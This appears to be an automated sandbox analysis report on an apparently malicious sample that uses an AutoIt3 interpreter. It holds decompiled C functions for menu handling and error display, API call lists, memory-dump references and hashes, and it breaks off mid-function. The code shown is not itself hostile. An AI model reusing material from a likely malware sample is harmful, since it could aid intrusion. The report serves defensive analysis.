                            0x00ab8a96
                            0x00a92278
                            0x00a9227d
                            0x00a92282
                            0x00ab8aa4
                            0x00ab8aab
                            0x00ab8aac
                            0x00ab8ab1
                            0x00ab8ab1
                            0x00a9228e
                            0x00a92293
                            0x00a92298
                            0x00ab8ac5
                            0x00ab8acf
                            0x00ab8ad6
                            0x00ab8ae2
                            0x00ab8af0
                            0x00ab8af5
                            0x00ab8afb
                            0x00ab8afe
                            0x00ab8b03
                            0x00ab8b03
                            0x00a922a4
                            0x00a922a9
                            0x00a922ae
                            0x00ab8b11
                            0x00ab8b1b
                            0x00ab8b29
                            0x00ab8b2e
                            0x00ab8b31
                            0x00ab8b37
                            0x00ab8b3a
                            0x00ab8b3f
                            0x00ab8b3f
                            0x00a922bc
                            0x00a922c4
                            0x00a922c9
                            0x00a922cc
                            0x00a922d2
                            0x00a922d3
                            0x00a922d3
                            0x00a922da
                            0x00ab8b4f
                            0x00ab8b4f
                            0x00a922e0
                            0x00a922e6
                            0x00a922eb
                            0x00a922f0
                            0x00a922f6
                            0x00a922fb
                            0x00a922fe
                            0x00a92300
                            0x00a92305
                            0x00a9230c
                            0x00a92310
                            0x00a92312
                            0x00a92314
                            0x00a92317
                            0x00a92318
                            0x00a9231d
                            0x00a92320
                            0x00a92325
                            0x00a92328
                            0x00a9232d
                            0x00a92332
                            0x00a92337
                            0x00a9233f
                            0x00000000
                            0x00000000
                            0x00ab8b47
                            0x00ab8b47
                            0x00a92314
                            0x00a92345
                            0x00a92348
                            0x00a92358
                            0x00a9235d
                            0x00a92364
                            0x00a9236b
                            0x00a92373
                            0x00a92374
                            0x00a9238a

                            APIs
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • __wcsicoll.LIBCMT ref: 00A92262
                            • __wcsicoll.LIBCMT ref: 00A92278
                            • __wcsicoll.LIBCMT ref: 00A9228E
                              • Part of subcall function 00AA13CB: __wcsicmp_l.LIBCMT ref: 00AA144B
                            • __wcsicoll.LIBCMT ref: 00A922A4
                            • _wcscpy.LIBCMT ref: 00A922C4
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00000104), ref: 00AB8AD6
                            • _wcscpy.LIBCMT ref: 00AB8B29
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$CMDLINE$CMDLINERAW
                            • API String ID: 574121520-2189407872
                            • Opcode ID: 26432ad506bf60b3cc27428fd62b7e8f2d014ffe03c5426cd4efe0c1436f0705
                            • Instruction ID: 2abe61da1c21849b9ca67967197ead5c3437ce07857aa9819f0fd04711e2f878
                            • Opcode Fuzzy Hash: 26432ad506bf60b3cc27428fd62b7e8f2d014ffe03c5426cd4efe0c1436f0705
                            • Instruction Fuzzy Hash: B0717271E1420AABCF10EBE4DE92AEE77F9AF40344F504468E5057B192EF706949C7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF7BBF, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AF7BBF(void* __eflags, void* __fp0, signed int _a4, int _a8, int _a12) {
				int _v12;
				char _v16;
				int _v20;
				struct tagMENUITEMINFOW _v68;
				struct HMENU__** _t69;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr _t86;
				signed int _t88;
				intOrPtr _t89;
				signed int _t91;
				unsigned int _t99;
				signed int _t100;
				struct HMENU__* _t101;
				int _t113;
				int _t114;
				int _t115;
				int _t118;
				int _t119;
				struct HMENU__** _t120;
				void* _t126;

				_t126 = __fp0;
				_t99 = _a8;
				_t120 = _a4;
				_v68.cbSize = 0x30;
				E00AA2E60( &(_v68.fMask), 0, 0x2c);
				_t102 =  &_a8;
				_v68.fMask = 1;
				_a8 = 0xffffffff;
				if(E00AC4160(_t120, _t99 & 0x0000ffff,  &_a8) == 0) {
					L38:
					__eflags = 0;
					return 0;
				} else {
					_t113 = _a8;
					_t69 =  *(_t120 + 0x1b4 + _t113 * 4);
					if(_t113 != 3) {
						__eflags = _t113 - 4;
						if(_t113 != 4) {
							_t100 = _t99 >> 0x10;
							__eflags = _t100;
							if(_t100 != 0) {
								goto L38;
							} else {
								__eflags = _a12 - _t100;
								if(_a12 != _t100) {
									goto L38;
								} else {
									__eflags =  *0xb274ec - _t100;
									if( *0xb274ec != _t100) {
										goto L38;
									} else {
										__eflags = _t120[1];
										_t101 =  *_t69;
										if(_t120[1] == 0) {
											L34:
											__eflags = _t120[1];
											if(__eflags == 0) {
												goto L33;
											} else {
												GetMenuItemInfoW(_t101, _t113, 0,  &_v68);
												__eflags = _v68.fState & 0x00000008;
												if((_v68.fState & 0x00000008) == 0) {
													_t62 =  &(_v68.fState);
													 *_t62 = _v68.fState | 0x00000008;
													__eflags =  *_t62;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00AE3AE4( &_v68, __eflags, _t120, _t113);
													return 1;
												} else {
													_t59 =  &(_v68.fState);
													 *_t59 = _v68.fState ^ 0x00000008;
													__eflags =  *_t59;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00AE3AE4( &_v68, __eflags, _t120, _t113);
													return 1;
												}
											}
										} else {
											__eflags = _t69[1];
											if(_t69[1] == 0) {
												goto L34;
											} else {
												_a12 = 0xffffffff;
												_t81 = GetMenuItemCount(_t101);
												__eflags = _t120[1];
												_a4 = _t81;
												if(_t120[1] != 0) {
													_t81 = _t81 - 4;
													__eflags = _t81;
													_a4 = _t81;
												}
												_t114 = 0;
												__eflags = _t81;
												if(_t81 <= 0) {
													_t82 = _a12;
													goto L22;
												} else {
													while(1) {
														_t82 = GetMenuItemID(_t101, _t114);
														__eflags = _t82 - _a8;
														if(_t82 == _a8) {
															break;
														}
														_t114 = _t114 + 1;
														__eflags = _t114 - _a4;
														if(_t114 < _a4) {
															continue;
														} else {
															L22:
															__eflags = _t82 - _a8;
															if(__eflags == 0) {
																break;
															}
														}
														goto L32;
													}
													_v12 = _t114;
													_t115 = _t114 - 1;
													__eflags = _t115;
													while(_t115 >= 0) {
														_a12 = GetMenuItemID(_t101, _t115);
														_t88 = E00AC4160(_t120, _t87,  &_v16);
														__eflags = _t88;
														if(_t88 == 0) {
															goto L26;
														} else {
															_t89 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t89 + 5));
															if( *((char*)(_t89 + 5)) != 0) {
																goto L26;
															}
														}
														goto L27;
														L26:
														_t115 = _t115 - 1;
														__eflags = _t115;
													}
													L27:
													_v20 = _t115 + 1;
													_t118 = _v12 + 1;
													__eflags = _t118 - _a4;
													while(_t118 < _a4) {
														_a12 = GetMenuItemID(_t101, _t118);
														_t85 = E00AC4160(_t120, _t84,  &_v16);
														__eflags = _t85;
														if(_t85 == 0) {
															goto L30;
														} else {
															_t86 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t86 + 5));
															if( *((char*)(_t86 + 5)) != 0) {
																goto L30;
															}
														}
														goto L31;
														L30:
														_t118 = _t118 + 1;
														__eflags = _t118 - _a4;
													}
													L31:
													_t102 = _v12;
													_t119 = _t118 - 1;
													__eflags = _t119;
													CheckMenuRadioItem(_t101, _v20, _t119, _v12, 0x400);
												}
												L32:
												_t113 = _a8;
												L33:
												E00AE3AE4(_t102, __eflags, _t120, _t113);
												return 1;
											}
										}
									}
								}
							}
						} else {
							_t91 = GetMenuItemInfoW( *_t120, _t113, 0,  &_v68);
							__eflags = _t91;
							if(_t91 == 0) {
								goto L38;
							} else {
								__eflags = _v68.fState & 0x00000008;
								if((_v68.fState & 0x00000008) == 0) {
									_t18 =  &(_v68.fState);
									 *_t18 = _v68.fState | 0x00000008;
									__eflags =  *_t18;
									 *0xb274ec = 1;
								} else {
									_v68.fState = _v68.fState ^ 0x00000008;
									 *0xb274ec = 0;
								}
								SetMenuItemInfoW( *_t120, 4, 0,  &_v68);
								E00A91E00(_t120, _t126);
								Sleep(0x1f4);
								return 1;
							}
						}
					} else {
						 *0xb274f0 = 2;
						 *0xb274e6 = 1;
						return 1;
					}
				}
			}

























                            0x00af7bbf
                            0x00af7bc6
                            0x00af7bca
                            0x00af7bd6
                            0x00af7bdd
                            0x00af7be5
                            0x00af7bee
                            0x00af7bf5
                            0x00af7c03
                            0x00af7e21
                            0x00af7e21
                            0x00af7e27
                            0x00af7c09
                            0x00af7c09
                            0x00af7c0c
                            0x00af7c16
                            0x00af7c34
                            0x00af7c37
                            0x00af7c9f
                            0x00af7ca2
                            0x00af7ca4
                            0x00000000
                            0x00af7caa
                            0x00af7caa
                            0x00af7cad
                            0x00000000
                            0x00af7cb3
                            0x00af7cb3
                            0x00af7cb9
                            0x00000000
                            0x00af7cbf
                            0x00af7cbf
                            0x00af7cc3
                            0x00af7cc5
                            0x00af7dbb
                            0x00af7dbb
                            0x00af7dbf
                            0x00000000
                            0x00af7dc1
                            0x00af7dc9
                            0x00af7dd4
                            0x00af7dd7
                            0x00af7dfc
                            0x00af7dfc
                            0x00af7dfc
                            0x00af7e07
                            0x00af7e0f
                            0x00af7e1c
                            0x00af7dd9
                            0x00af7dd9
                            0x00af7dd9
                            0x00af7dd9
                            0x00af7de4
                            0x00af7dec
                            0x00af7df9
                            0x00af7df9
                            0x00af7dd7
                            0x00af7ccb
                            0x00af7ccb
                            0x00af7ccf
                            0x00000000
                            0x00af7cd5
                            0x00af7cd6
                            0x00af7cdd
                            0x00af7ce3
                            0x00af7ce7
                            0x00af7cea
                            0x00af7cec
                            0x00af7cec
                            0x00af7cef
                            0x00af7cef
                            0x00af7cf2
                            0x00af7cf4
                            0x00af7cf6
                            0x00af7d14
                            0x00000000
                            0x00af7cff
                            0x00af7cff
                            0x00af7d01
                            0x00af7d07
                            0x00af7d0a
                            0x00000000
                            0x00000000
                            0x00af7d0c
                            0x00af7d0d
                            0x00af7d10
                            0x00000000
                            0x00af7d12
                            0x00af7d17
                            0x00af7d17
                            0x00af7d1a
                            0x00000000
                            0x00000000
                            0x00af7d1a
                            0x00000000
                            0x00af7d10
                            0x00af7d20
                            0x00af7d23
                            0x00af7d23
                            0x00af7d24
                            0x00af7d34
                            0x00af7d37
                            0x00af7d3c
                            0x00af7d3e
                            0x00000000
                            0x00af7d40
                            0x00af7d43
                            0x00af7d4a
                            0x00af7d4e
                            0x00000000
                            0x00000000
                            0x00af7d4e
                            0x00000000
                            0x00af7d50
                            0x00af7d50
                            0x00af7d50
                            0x00af7d50
                            0x00af7d53
                            0x00af7d54
                            0x00af7d5a
                            0x00af7d5b
                            0x00af7d5e
                            0x00af7d6e
                            0x00af7d71
                            0x00af7d76
                            0x00af7d78
                            0x00000000
                            0x00af7d7a
                            0x00af7d7d
                            0x00af7d84
                            0x00af7d88
                            0x00000000
                            0x00000000
                            0x00af7d88
                            0x00000000
                            0x00af7d8a
                            0x00af7d8a
                            0x00af7d8b
                            0x00af7d8b
                            0x00af7d90
                            0x00af7d90
                            0x00af7d9c
                            0x00af7d9c
                            0x00af7da0
                            0x00af7da0
                            0x00af7da6
                            0x00af7da6
                            0x00af7da9
                            0x00af7dab
                            0x00af7db8
                            0x00af7db8
                            0x00af7ccf
                            0x00af7cc5
                            0x00af7cb9
                            0x00af7cad
                            0x00af7c39
                            0x00af7c43
                            0x00af7c49
                            0x00af7c4b
                            0x00000000
                            0x00af7c51
                            0x00af7c56
                            0x00af7c59
                            0x00af7c67
                            0x00af7c67
                            0x00af7c67
                            0x00af7c6a
                            0x00af7c5b
                            0x00af7c5b
                            0x00af7c5e
                            0x00af7c5e
                            0x00af7c7c
                            0x00af7c84
                            0x00af7c8e
                            0x00af7c9c
                            0x00af7c9c
                            0x00af7c4b
                            0x00af7c18
                            0x00af7c18
                            0x00af7c22
                            0x00af7c31
                            0x00af7c31
                            0x00af7c16

                            APIs
                            • _memset.LIBCMT ref: 00AF7BDD
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 00AF7C43
                            • SetMenuItemInfoW.USER32 ref: 00AF7C7C
                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 00AF7C8E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: InfoItemMenu$Sleep_memset
                            • String ID: 0
                            • API String ID: 1504565804-4108050209
                            • Opcode ID: f57703185287653c3af6e5c918abb4a1b919c828ca36303dfd6a82c2840514c5
                            • Instruction ID: 983b3cb8fffd67d2ab9696a99ac0fc28d60cc03539cb89844c471ae60ef083a8
                            • Opcode Fuzzy Hash: f57703185287653c3af6e5c918abb4a1b919c828ca36303dfd6a82c2840514c5
                            • Instruction Fuzzy Hash: F371D271504248ABDB20DF94EC89FFF7BA9FF95310F40815AFA1587281DB71A952CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF05C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E00AF05C5(WCHAR* __edx, void* __fp0, intOrPtr _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				void* _v44;
				char _v60;
				WCHAR* _v76;
				short _v8272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t82;
				int _t83;
				int _t85;
				WCHAR* _t96;
				intOrPtr _t108;
				void* _t117;

				_t117 = __fp0;
				_t93 = __edx;
				_t38 = E00AB2160(0x2050);
				_t82 = _a4;
				_t112 = _t82;
				if(_t82 > 0) {
					_t85 =  *0xb39130; // 0x66
					LoadStringW(GetModuleHandleW(0), _t85,  &_v8272, 0xfff);
					_t96 =  &_v8272;
					E00A91D10(_t96,  &_v76, _t112);
					LoadStringW(GetModuleHandleW(0), _a8, _t96, 0xfff);
					E00A91D10(_t96,  &_v60, _t112);
					_a4 = E00AC48C5(_t82);
					_t48 = E00AC4891(_t82);
					_t106 = _t48;
					_v28 = _t48;
					_t83 = E00AC48EF(E00AC4916(_t82));
					_a8 = _t83;
					_t113 = _t83;
					if(_t83 != 0) {
						_push(_t83);
						_t93 =  &_v8272;
						E00AA31BB( &_v8272,  &_v8272, L"Line %d  (File \"%s\"):\n\n", _t106);
					} else {
						E00AA31BB(_t93, _t96, L"Line %d:\n\n", _t106);
					}
					E00A91D10( &_v8272,  &_v24, _t113);
					_t108 = _a4;
					E00A91DE0( &_v24, _t85, _t108, _t117);
					E00A91DE0( &_v24, _t85, "\n", _t117);
					_t86 =  &_v44;
					E00A9BEC0( &_v44, _t113);
					_t100 = _a12;
					if(_a12 >= 0) {
						E00A92390( &_v44, _t108, _t93, _t100);
						E00A9C850( &_v44 | 0xffffffff,  &_v44, _t100);
						E00A91DE0( &_v44,  &_v44, L"^ ERROR", _t117);
						_t86 =  &_v44;
						E00A9BFA0( &_v24, _t117,  &_v44);
						E00A91DE0( &_v24,  &_v44, "\n", _t117);
						_t83 = _a8;
					}
					E00A91DE0( &_v24, _t86, L"\nError: ", _t117);
					E00A9BFA0( &_v24, _t117,  &_v60);
					_t116 =  *0xb390eb;
					if( *0xb390eb == 0) {
						MessageBoxW(0, _v24, _v76, 0x11010);
					} else {
						_push(_v44);
						_push(_t108);
						_push(_v60);
						_push(_v28);
						_push(_t83);
						_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
						E00AA39DE(_t83, _v28, L"\nError: ", _t108, _t116);
					}
					E00A92480( &_v44);
					E00A92480( &_v24);
					E00A92480( &_v60);
					return E00A92480( &_v76);
				}
				return _t38;
			}





















                            0x00af05c5
                            0x00af05c5
                            0x00af05cd
                            0x00af05d3
                            0x00af05d8
                            0x00af05da
                            0x00af05e0
                            0x00af05fc
                            0x00af0602
                            0x00af060b
                            0x00af0623
                            0x00af062c
                            0x00af0638
                            0x00af063b
                            0x00af0640
                            0x00af0643
                            0x00af0651
                            0x00af0653
                            0x00af0656
                            0x00af0658
                            0x00af066b
                            0x00af066d
                            0x00af0679
                            0x00af065a
                            0x00af0661
                            0x00af0666
                            0x00af068a
                            0x00af068f
                            0x00af0697
                            0x00af06a4
                            0x00af06a9
                            0x00af06ac
                            0x00af06b1
                            0x00af06b6
                            0x00af06bd
                            0x00af06ca
                            0x00af06d7
                            0x00af06dc
                            0x00af06e3
                            0x00af06f0
                            0x00af06f5
                            0x00af06f5
                            0x00af0700
                            0x00af070c
                            0x00af0711
                            0x00af0718
                            0x00af0746
                            0x00af071a
                            0x00af0723
                            0x00af0724
                            0x00af0725
                            0x00af0726
                            0x00af0727
                            0x00af0728
                            0x00af072d
                            0x00af0732
                            0x00af074f
                            0x00af0757
                            0x00af075f
                            0x00000000
                            0x00af0767
                            0x00af0772

                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00AB7F37,?,0000138C,?,00000001,?,?,?), ref: 00AF05F5
                            • LoadStringW.USER32(00000000,?,00AB7F37,?), ref: 00AF05FC
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00AB7F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 00AF061C
                            • LoadStringW.USER32(00000000,?,00AB7F37,?), ref: 00AF0623
                            • __swprintf.LIBCMT ref: 00AF0661
                            • __swprintf.LIBCMT ref: 00AF0679
                            • _wprintf.LIBCMT ref: 00AF072D
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF0746
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 3631882475-2268648507
                            • Opcode ID: 0165d7fb1f12397b9f4b45757cc165a82b61457fd4f68e690066b990fb696ab5
                            • Instruction ID: 55f5d26ecd9a0ba00e0f77e3595741f2d2a2b5080a5e0b3c50f0611adb9d39c6
                            • Opcode Fuzzy Hash: 0165d7fb1f12397b9f4b45757cc165a82b61457fd4f68e690066b990fb696ab5
                            • Instruction Fuzzy Hash: 63413F72A1020AABDF10FBA0DD86EEE77BCAF44751F944065F604B7152DA70AE45CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEE724, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00AEE724(void* __fp0, struct HINSTANCE__* _a4, int _a8, intOrPtr _a12) {
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				char _v68;
				WCHAR* _v84;
				short _v8280;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t51;
				intOrPtr _t96;
				WCHAR* _t100;
				WCHAR* _t118;
				intOrPtr _t119;
				intOrPtr _t129;
				intOrPtr _t131;
				struct HINSTANCE__* _t132;
				void* _t146;

				_t146 = __fp0;
				_t51 = E00AB2160(0x2058);
				if( *0xb274e2 == 0) {
					_t51 = _a4;
					_t138 =  *((intOrPtr*)(_t51 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t51 + 0xf8)) != 1) {
						LoadStringW( *0xb27520, 0x66,  &_v8280, 0xfff);
						_t118 =  &_v8280;
						E00A91D10(_t118,  &_v84, _t138);
						_t111 =  *0xb27520;
						LoadStringW( *0xb27520, _a8, _t118, 0xfff);
						E00A91D10(_t118,  &_v68, _t138);
						_t129 =  *((intOrPtr*)(_a4 + 0xf4));
						_v36 = E00AC48C5(_t129);
						_t119 = E00AC4891(_t129);
						_v28 = _t119;
						_t96 = E00AC48EF(E00AC4916(_t129));
						_v32 = _t96;
						_t100 =  &_v8280;
						_t139 = _t96;
						if(_t96 == 0) {
							_t111 = _a4;
							_push( *((intOrPtr*)(_a4 + 0xc8)));
							_push(_t129);
						} else {
							_push(_t96);
							_push(_t119);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t100);
						E00AA31BB(_t111);
						E00A91D10( &_v8280,  &_v24, _t139);
						_t131 = _v36;
						_t140 = _t131;
						if(_t131 != 0) {
							E00A91DE0( &_v24, _t100, _t131, _t146);
							E00A91DE0( &_v24, _t100, "\n", _t146);
						}
						_t101 =  &_v52;
						E00A9BEC0( &_v52, _t140);
						_t121 = _a12;
						if(_a12 >= 0) {
							E00A9C850(E00A92390( &_v52, _t131, _t111, _t121) | 0xffffffff,  &_v52, _t121);
							E00A91DE0( &_v52,  &_v52, L"^ ERROR", _t146);
							E00A9BFA0( &_v24, _t146,  &_v52);
							E00A91DE0( &_v24,  &_v52, "\n", _t146);
							_t96 = _v32;
						}
						E00A91DE0( &_v24, _t101, L"\nError: ", _t146);
						E00A9BFA0( &_v24, _t146,  &_v68);
						if( *0xb274e8 == 0) {
							MessageBoxW( *0xb27518, _v24, _v84, 0x11010);
							goto L14;
						} else {
							_t144 = _t96;
							if(_t96 == 0) {
								_t132 = _a4;
								_push(_v68);
								_push( *((intOrPtr*)(_t132 + 0xf4)));
								_push( *((intOrPtr*)(_t132 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00AA39DE(_t96, _v68, L"\nError: ", _t132, __eflags);
								L15:
								 *((intOrPtr*)(_t132 + 0xf8)) = 1;
								if( *((char*)(_t132 + 0x118)) == 0) {
									 *0xb274f4 = 1;
								} else {
									 *0xb274f4 = _a8 + 0x7ffff000;
								}
								E00A92480( &_v52);
								E00A92480( &_v24);
								E00A92480( &_v68);
								return E00A92480( &_v84);
							}
							_push(_v52);
							_push(_t131);
							_push(_v68);
							_push(_v28);
							_push(_t96);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00AA39DE(_t96, _v52, L"\nError: ", _t131, _t144);
							L14:
							_t132 = _a4;
							goto L15;
						}
					}
				}
				return _t51;
			}
























                            0x00aee724
                            0x00aee72c
                            0x00aee73b
                            0x00aee741
                            0x00aee744
                            0x00aee74b
                            0x00aee76c
                            0x00aee76e
                            0x00aee777
                            0x00aee77f
                            0x00aee78d
                            0x00aee792
                            0x00aee79a
                            0x00aee7a7
                            0x00aee7af
                            0x00aee7b2
                            0x00aee7c0
                            0x00aee7c2
                            0x00aee7c5
                            0x00aee7cb
                            0x00aee7cd
                            0x00aee7d3
                            0x00aee7dc
                            0x00aee7dd
                            0x00aee7cf
                            0x00aee7cf
                            0x00aee7d0
                            0x00aee7d0
                            0x00aee7de
                            0x00aee7e3
                            0x00aee7e4
                            0x00aee7f5
                            0x00aee7fa
                            0x00aee7fd
                            0x00aee7ff
                            0x00aee806
                            0x00aee813
                            0x00aee813
                            0x00aee818
                            0x00aee81b
                            0x00aee820
                            0x00aee825
                            0x00aee839
                            0x00aee846
                            0x00aee852
                            0x00aee85f
                            0x00aee864
                            0x00aee864
                            0x00aee86f
                            0x00aee87b
                            0x00aee887
                            0x00aee8e2
                            0x00000000
                            0x00aee889
                            0x00aee889
                            0x00aee88b
                            0x00aee8ad
                            0x00aee8bc
                            0x00aee8bd
                            0x00aee8be
                            0x00aee8bf
                            0x00aee8c4
                            0x00aee8eb
                            0x00aee8f7
                            0x00aee8fd
                            0x00aee910
                            0x00aee8ff
                            0x00aee908
                            0x00aee908
                            0x00aee918
                            0x00aee920
                            0x00aee928
                            0x00000000
                            0x00aee930
                            0x00aee896
                            0x00aee897
                            0x00aee898
                            0x00aee899
                            0x00aee89a
                            0x00aee89b
                            0x00aee8a0
                            0x00aee8e8
                            0x00aee8e8
                            0x00000000
                            0x00aee8e8
                            0x00aee887
                            0x00aee74b
                            0x00aee93b

                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 00AEE76C
                              • Part of subcall function 00A91D10: _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00A91D10: _memmove.LIBCMT ref: 00A91D57
                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 00AEE78D
                            • __swprintf.LIBCMT ref: 00AEE7E4
                            • _wprintf.LIBCMT ref: 00AEE8A0
                            • _wprintf.LIBCMT ref: 00AEE8C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-2354261254
                            • Opcode ID: 0c680b485d2e9d21bf91db4ca1403b44f4c57408be25512060992f06d91db85f
                            • Instruction ID: 9fa19f5c99579feb541da3e1f0e88cb4e73ba98381c42e4df96bb761971d9341
                            • Opcode Fuzzy Hash: 0c680b485d2e9d21bf91db4ca1403b44f4c57408be25512060992f06d91db85f
                            • Instruction Fuzzy Hash: AB518272A10219ABDB14EFA0CD81EEF77B8FF44750F504169F90467251DB70AE45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE3126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00AE3126(intOrPtr* _a4) {
				char _v20;
				char _v152;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 =  *((intOrPtr*)(_t38 + 8));
				if(_t30 == 4) {
					return _t30;
				} else {
					_t31 = _t30 - 1;
					if(_t31 > 0xa) {
						L17:
						_v152 = 0;
						goto L18;
					} else {
						switch( *((intOrPtr*)(_t31 * 4 +  &M00AE32FA))) {
							case 0:
								E00AA2F7C( *_t38,  &_v152, 0xa);
								_t50 = _t50 + 0xc;
								goto L18;
							case 1:
								__eax =  *(__ebx + 4);
								__ecx =  *__ebx;
								_t7 =  &_v152; // -148
								__edx = _t7;
								__eax = E00AA3029( *__ebx,  *(__ebx + 4), _t7, 0xa);
								goto L18;
							case 2:
								__esp = __esp - 8;
								 *__esp =  *__ebx;
								_t8 =  &_v152; // -148
								__edx = _t8;
								_push(L"%.15g");
								_push(__edx);
								__eax = E00AA31BB(__edx);
								__esp = __esp + 0x10;
								goto L18;
							case 3:
								goto L17;
							case 4:
								__eax =  *__ebx;
								_t9 =  &_v152; // -148
								__ecx = _t9;
								__eax = E00AA31BB(__edx, _t9, L"0x%p",  *__ebx);
								goto L18;
							case 5:
								__eflags =  *__ebx;
								if( *__ebx == 0) {
									_t11 =  &_v152; // -148
